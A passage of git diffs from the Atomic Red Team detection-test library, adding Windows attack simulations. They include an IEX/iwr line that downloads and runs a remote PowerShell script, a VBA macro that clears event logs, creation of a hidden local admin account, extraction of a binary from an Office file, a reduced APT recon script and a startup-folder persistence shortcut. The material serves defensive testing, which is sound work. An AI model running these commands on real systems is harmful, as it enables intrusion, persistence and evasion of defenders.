TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | @@ -31,16 +31,16 @@ | | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | | | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [File Deletion](../../T1070.004/T1070.004.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | [Remote Access Software](../../T1219/T1219.md) | | -| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Local Accounts](../../T1078.003/T1078.003.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | -| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Hide Artifacts](../../T1564/T1564.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Office Test](../../T1137.002/T1137.002.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | @@ -51,7 +51,7 @@ | | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | | | | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | | | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 865ac911..ab294853 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -4166,7 +4166,24 @@ privilege-escalation: - Linux - macOS - Windows - atomic_tests: [] + identifier: T1078.003 + atomic_tests: + - name: Create local account with admin priviliges + auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 + description: After execution the new account will be active and added to the + Administrators group + supported_platforms: + - windows + executor: + command: |- + net user art-test /add + net user art-test Password123! + net localgroup administrators art-test /add + cleanup_command: |- + net localgroup administrators art-test /delete >nul 2>&1 + net user art-test /delete >nul 2>&1 + name: command_prompt + elevation_required: true T1037.002: technique: external_references: @@ -13398,7 +13415,24 @@ persistence: - Linux - macOS - Windows - atomic_tests: [] + identifier: T1078.003 + atomic_tests: + - name: Create local account with admin priviliges + auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 + description: After execution the new account will be active and added to the + Administrators group + supported_platforms: + - windows + executor: + command: |- + net user art-test /add + net user art-test Password123! + net localgroup administrators art-test /add + cleanup_command: |- + net localgroup administrators art-test /delete >nul 2>&1 + net user art-test /delete >nul 2>&1 + name: command_prompt + elevation_required: true T1037.002: technique: external_references: @@ -26845,6 +26879,34 @@ defense-evasion: Get-EventLog -list name: powershell elevation_required: true + - name: Clear Event Logs via VBA + auto_generated_guid: 1b682d84-f075-4f93-9a89-8a8de19ffd6e + description: "This module utilizes WMI via VBA to clear the Security and Backup + eventlogs from the system. \n\nElevation is required for this module to execute + properly, otherwise WINWORD will throw an \"Access Denied\" error\n" + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft Word must be installed + +' + prereq_command: | + try { + New-Object -COMObject "Word.Application" | Out-Null + Stop-Process -Name "winword" + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually + to meet this requirement" + +' + executor: + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" + name: powershell + elevation_required: true T1078.004: technique: id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 @@ -30905,7 +30967,46 @@ defense-evasion: - Linux - macOS - Windows - atomic_tests: [] + identifier: T1564 + atomic_tests: + - name: Extract binary files via VBA + auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a + description: "This module extracts a binary (calc.exe) from inside of another + binary. \n\nIn the wild maldoc authors will use this technique to hide binaries + inside of files stored \nwithin the office document itself. An example of + this technique can be seen in sample\n\nf986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226\n\nThis + sample contains a document inside of itself. Document 1 is the actual maldoc + itself, document 2\nis the same document without all the malicious code. Document + 1 will copy Document 2 to the file system\nand then \"peek\" inside of this + document and pull out the oleObject.bin file. Contained inside of this\noleObject.bin + file is a payload that is parsed out and executed on the file system.\n" + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft Word must be installed + +' + prereq_command: | + try { + New-Object -COMObject "Word.Application" | Out-Null + Stop-Process -Name "winword" + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually + to meet this requirement" + +' + executor: + command: | + $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") + $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap + cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore + +' + name: powershell T1574: technique: external_references: @@ -32933,7 +33034,24 @@ defense-evasion: - Linux - macOS - Windows - atomic_tests: [] + identifier: T1078.003 + atomic_tests: + - name: Create local account with admin priviliges + auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 + description: After execution the new account will be active and added to the + Administrators group + supported_platforms: + - windows + executor: + command: |- + net user art-test /add + net user art-test Password123! + net localgroup administrators art-test /add + cleanup_command: |- + net localgroup administrators art-test /delete >nul 2>&1 + net user art-test /delete >nul 2>&1 + name: command_prompt + elevation_required: true T1127.001: technique: external_references: @@ -47145,6 +47263,26 @@ discovery: ' name: command_prompt + - name: Griffon Recon + auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 + description: "Griffon is a sophisticated tool believed to be in use by one of + more \"APT\" groups. This atomic is for detecting, specifically, the reconnaissance + part of the tool.\nThis script used here was reduced by security researcher + Kirk Sayre (github.com/kirk-sayre-work/1a9476e7708ed650508f9fb5adfbad9d), + \nand it gives the exact same recon behavior as the original (minus the C2 + interaction). \nFor more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon + and https://attack.mitre.org/software/S0417/" + supported_platforms: + - windows + input_arguments: + vbscript: + description: Path to sample script + type: String + default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs + executor: + command: 'cscript #{vbscript}' + name: powershell + elevation_required: false T1016: technique: id: attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0 @@ -60977,7 +61115,24 @@ initial-access: - Linux - macOS - Windows - atomic_tests: [] + identifier: T1078.003 + atomic_tests: + - name: Create local account with admin priviliges + auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 + description: After execution the new account will be active and added to the + Administrators group + supported_platforms: + - windows + executor: + command: |- + net user art-test /add + net user art-test Password123! + net localgroup administrators art-test /add + cleanup_command: |- + net localgroup administrators art-test /delete >nul 2>&1 + net user art-test /delete >nul 2>&1 + name: command_prompt + elevation_required: true T1566: technique: id: attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b diff --git a/atomics/T1070.001/T1070.001.md b/atomics/T1070.001/T1070.001.md index affa9a86..73fbb8bf 100644 --- a/atomics/T1070.001/T1070.001.md +++ b/atomics/T1070.001/T1070.001.md @@ -16,6 +16,8 @@ These logs may also be cleared through other mechanisms, such as the event viewe - [Atomic Test #2 - Delete System Logs Using Clear-EventLog](#atomic-test-2---delete-system-logs-using-clear-eventlog) +- [Atomic Test #3 - Clear Event Logs via VBA](#atomic-test-3---clear-event-logs-via-vba) +
@@ -73,4 +75,47 @@ Get-EventLog -list +
+
+ +## Atomic Test #3 - Clear Event Logs via VBA +This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system. + +Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") +Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Microsoft Word must be installed +##### Check Prereq Commands: +```powershell +try { + New-Object -COMObject "Word.Application" | Out-Null + Stop-Process -Name "winword" + exit 0 +} catch { exit 1 } +``` +##### Get Prereq Commands: +```powershell +Write-Host "You will need to install Microsoft Word manually to meet this requirement" +``` + + + +
diff --git a/atomics/T1070.001/T1070.001.yaml b/atomics/T1070.001/T1070.001.yaml index 7ee1a5e7..8232cff2 100644 --- a/atomics/T1070.001/T1070.001.yaml +++ b/atomics/T1070.001/T1070.001.yaml @@ -33,7 +33,7 @@ atomic_tests: name: powershell elevation_required: true - name: Clear Event Logs via VBA - auto_generated_guid: + auto_generated_guid: 1b682d84-f075-4f93-9a89-8a8de19ffd6e description: | This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system. diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md index 149811ec..36d3713c 100644 --- a/atomics/T1078.003/T1078.003.md +++ b/atomics/T1078.003/T1078.003.md @@ -2,20 +2,18 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1078/003)
Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. -Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003/). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.
- +Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.
## Atomic Tests -- [Atomic Test #1 - Create new account with admin priviliges](#atomic-test-1---create-new-account-with-admin-priviliges) +- [Atomic Test #1 - Create local account with admin priviliges](#atomic-test-1---create-local-account-with-admin-priviliges)
-## Atomic Test #1 - Create new account with admin privileges +## Atomic Test #1 - Create local account with admin priviliges After execution the new account will be active and added to the Administrators group - **Supported Platforms:** Windows diff --git a/atomics/T1078.003/T1078.003.yaml b/atomics/T1078.003/T1078.003.yaml index caed1608..697a4f9d 100644 --- a/atomics/T1078.003/T1078.003.yaml +++ b/atomics/T1078.003/T1078.003.yaml @@ -2,6 +2,7 @@ attack_technique: T1078.003 display_name: 'Valid Accounts: Local Accounts' atomic_tests: - name: Create local account with admin priviliges + auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 description: After execution the new account will be active and added to the Administrators group supported_platforms: diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 4336ddda..4c09bc81 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -24,6 +24,8 @@ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure a - [Atomic Test #8 - Windows MachineGUID Discovery](#atomic-test-8---windows-machineguid-discovery) +- [Atomic Test #9 - Griffon Recon](#atomic-test-9---griffon-recon) +
@@ -243,4 +245,36 @@ REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid +
+
+ +## Atomic Test #9 - Griffon Recon +Griffon is a sophisticated tool believed to be in use by one of more "APT" groups. This atomic is for detecting, specifically, the reconnaissance part of the tool. +This script used here was reduced by security researcher Kirk Sayre (github.com/kirk-sayre-work/1a9476e7708ed650508f9fb5adfbad9d), +and it gives the exact same recon behavior as the original (minus the C2 interaction). +For more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon and https://attack.mitre.org/software/S0417/ + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| vbscript | Path to sample script | String | PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +cscript #{vbscript} +``` + + + + + +
diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml index 406e8f29..2a669ef8 100644 --- a/atomics/T1082/T1082.yaml +++ b/atomics/T1082/T1082.yaml @@ -109,6 +109,7 @@ atomic_tests: REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid name: command_prompt - name: Griffon Recon + auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 description: |- Griffon is a sophisticated tool believed to be in use by one of more "APT" groups. This atomic is for detecting, specifically, the reconnaissance part of the tool. This script used here was reduced by security researcher Kirk Sayre (github.com/kirk-sayre-work/1a9476e7708ed650508f9fb5adfbad9d), diff --git a/atomics/T1564/T1564.md b/atomics/T1564/T1564.md new file mode 100644 index 00000000..25a386e1 --- /dev/null +++ b/atomics/T1564/T1564.md @@ -0,0 +1,68 @@ +# T1564 - Hide Artifacts +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1564) +
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015) + +Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)
+ +## Atomic Tests + +- [Atomic Test #1 - Extract binary files via VBA](#atomic-test-1---extract-binary-files-via-vba) + + +
+ +## Atomic Test #1 - Extract binary files via VBA +This module extracts a binary (calc.exe) from inside of another binary. + +In the wild maldoc authors will use this technique to hide binaries inside of files stored +within the office document itself. An example of this technique can be seen in sample + +f986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226 + +This sample contains a document inside of itself. Document 1 is the actual maldoc itself, document 2 +is the same document without all the malicious code. Document 1 will copy Document 2 to the file system +and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this +oleObject.bin file is a payload that is parsed out and executed on the file system. + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") +$macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") +Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap +``` + +#### Cleanup Commands: +```powershell +Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Microsoft Word must be installed +##### Check Prereq Commands: +```powershell +try { + New-Object -COMObject "Word.Application" | Out-Null + Stop-Process -Name "winword" + exit 0 +} catch { exit 1 } +``` +##### Get Prereq Commands: +```powershell +Write-Host "You will need to install Microsoft Word manually to meet this requirement" +``` + + + + +
diff --git a/atomics/T1564/T1564.yaml b/atomics/T1564/T1564.yaml index 9a59a90b..25d169fe 100644 --- a/atomics/T1564/T1564.yaml +++ b/atomics/T1564/T1564.yaml @@ -2,7 +2,7 @@ attack_technique: T1564 display_name: "Hide Artifacts" atomic_tests: - name: Extract binary files via VBA - auto_generated_guid: + auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a description: | This module extracts a binary (calc.exe) from inside of another binary. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 8b98a0c9..61e3d7c3 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -635,3 +635,7 @@ ecd3fa21-7792-41a2-8726-2c5c673414d3 234f9b7c-b53d-4f32-897b-b880a6c9ea7b 7cbb0f26-a4c1-4f77-b180-a009aa05637e 4cc40fd7-87b8-4b16-b2d7-57534b86b911 +1b682d84-f075-4f93-9a89-8a8de19ffd6e +a524ce99-86de-4db6-b4f9-e08f35a47a15 +69bd4abe-8759-49a6-8d21-0f15822d6370 +6afe288a-8a8b-4d33-a629-8d03ba9dad3a From 756a90294ba5e2b919f247bc362c8f37ab76608c Mon Sep 17 00:00:00 2001 From: 4rb1t3r <76012267+4rb1t3r@users.noreply.github.com> Date: Thu, 17 Dec 2020 09:23:03 -0500 Subject: [PATCH 015/131] Shortcut additions to user startup (#1329) * Shortcut additions to user startup New addition to test creating a shortcut link to an executable in a users startup directory * Update T1547.001.yaml * remove extra whitespace Co-authored-by: Carrie Roberts --- atomics/T1547.001/T1547.001.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml index 7e5fca13..f2808208 100644 --- a/atomics/T1547.001/T1547.001.yaml +++ b/atomics/T1547.001/T1547.001.yaml @@ -122,3 +122,19 @@ atomic_tests: Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore name: powershell elevation_required: true + +- name: Add Executable Shortcut Link to User Startup Folder + description: 'Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. ' + supported_platforms: + - windows + executor: + command: |- + $Target = "C:\Windows\System32\calc.exe" + $ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" + $WScriptShell = New-Object -ComObject WScript.Shell + $Create = $WScriptShell.CreateShortcut($ShortcutLocation) + $Create.TargetPath = $Target + $Create.Save() + cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore + name: powershell + elevation_required: true From 5ff80f6f90c056b0bfe3a6ffa0f5015f215c56b0 Mon Sep 17 00:00:00 2001 From: Keith McCammon Date: Thu, 17 Dec 2020 22:57:51 -0700 Subject: [PATCH 016/131] Update maintainers.md (#1335) * Update maintainers.md * Generate GUIDs from job=generate_and_commit_guids branch=maintainers-update * Generate docs from job=generate_and_commit_docs branch=maintainers-update Co-authored-by: CircleCI Atomic Red Team GUID generator --- atomics/Indexes/Indexes-CSV/index.csv | 2 ++ atomics/Indexes/Indexes-CSV/windows-index.csv | 2 ++ atomics/Indexes/Indexes-Markdown/index.md | 2 ++ .../Indexes/Indexes-Markdown/windows-index.md | 2 ++ atomics/Indexes/index.yaml | 32 +++++++++++++++++ atomics/T1547.001/T1547.001.md | 35 +++++++++++++++++++ atomics/T1547.001/T1547.001.yaml | 1 + atomics/used_guids.txt | 1 + docs/maintainers.md | 2 +- 9 files changed, 78 insertions(+), 1 deletion(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 36e0927d..eb43aae9 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -62,6 +62,7 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell R privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt @@ -156,6 +157,7 @@ persistence,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry R persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup 